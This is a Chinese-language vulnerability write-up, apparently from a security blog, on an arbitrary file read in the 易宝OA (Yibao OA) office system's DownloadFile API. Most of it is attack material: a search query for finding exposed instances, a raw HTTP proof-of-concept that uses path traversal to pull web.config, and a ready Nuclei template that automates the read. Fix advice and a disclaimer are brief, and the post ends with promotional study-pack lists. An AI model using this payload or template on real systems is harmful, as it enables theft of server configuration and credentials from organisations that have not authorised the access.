易宝OA downloadfile 任意文件读取

【产品&&漏洞简述】

易宝OA系统是一种专门为企业和机构的日常办公工作提供服务的综合性软件平台，具有信息管理、 流程管理 、知识管理（档案和业务管理）、协同办公等多种功能

易宝OA downloadfile 文件读取，攻击者可通过此漏洞获取敏感信息。

【资产测绘Query】

1. body="topvision_oaName"

【产品界面】

【漏洞复现】

【poc】

1. POST /api/files/DownloadFile HTTP/1.1
2. Host:
3. Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
4. Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
5. Accept-Encoding: gzip, deflate
6. Upgrade-Insecure-Requests: 1
7. User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:122.0) Gecko/20100101 Firefox/122.0
8. Content-Type: application/x-www-form-urlencoded
10. token=zxh&requestFileName=../../manager/web.config&pathType=1&startPosition=0&bufferSize=1000

【Nuclei-Poc验证】

1. id: yibao-oa-DownloadFile-read
3. info:
4. name: yibao-oa-DownloadFile-read
5. author: 111
6. severity: high
8. http:
9. - raw:
10. - |
11. POST /api/files/DownloadFile HTTP/1.1
12. Host: {{Hostname}}
13. User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.8; rv:21.0) Gecko/20100101 Firefox/21.0
14. Content-Length: 93
15. Content-Type: application/x-www-form-urlencoded
16. Accept-Encoding: gzip
18. token=zxh&requestFileName=../../manager/web.config&pathType=1&startPosition=0&bufferSize=1000
20. extractors:
21. - type: json
22. name: filetext
23. part: body
24. internal: true
25. group: 1
26. json:
27. - .data
29. matchers:
30. - type: dsl
31. dsl:
32. - "status_code==200 && contains_all(base64_decode(filetext),'add key','add name')"

【修复建议】

1、请联系厂商进行修复。
2、如非必要，禁止公网访问该系统。
3、设置白名单访问。

   声明：⽂中所涉及的技术、思路和⼯具仅供以安全为⽬的的学习交流使⽤，任何⼈不得将其⽤于⾮法⽤途以及盈利等⽬的，否则后果⾃⾏承担。所有渗透都需获取授权！

免费领取安全学习资料包！

渗透工具

技术文档、书籍

面试题

帮助你在面试中脱颖而出

视频

基础到进阶

环境搭建、HTML，PHP，MySQL基础学习，信息收集，SQL注入,XSS，CSRF，暴力破解等等

应急响应笔记

学习路线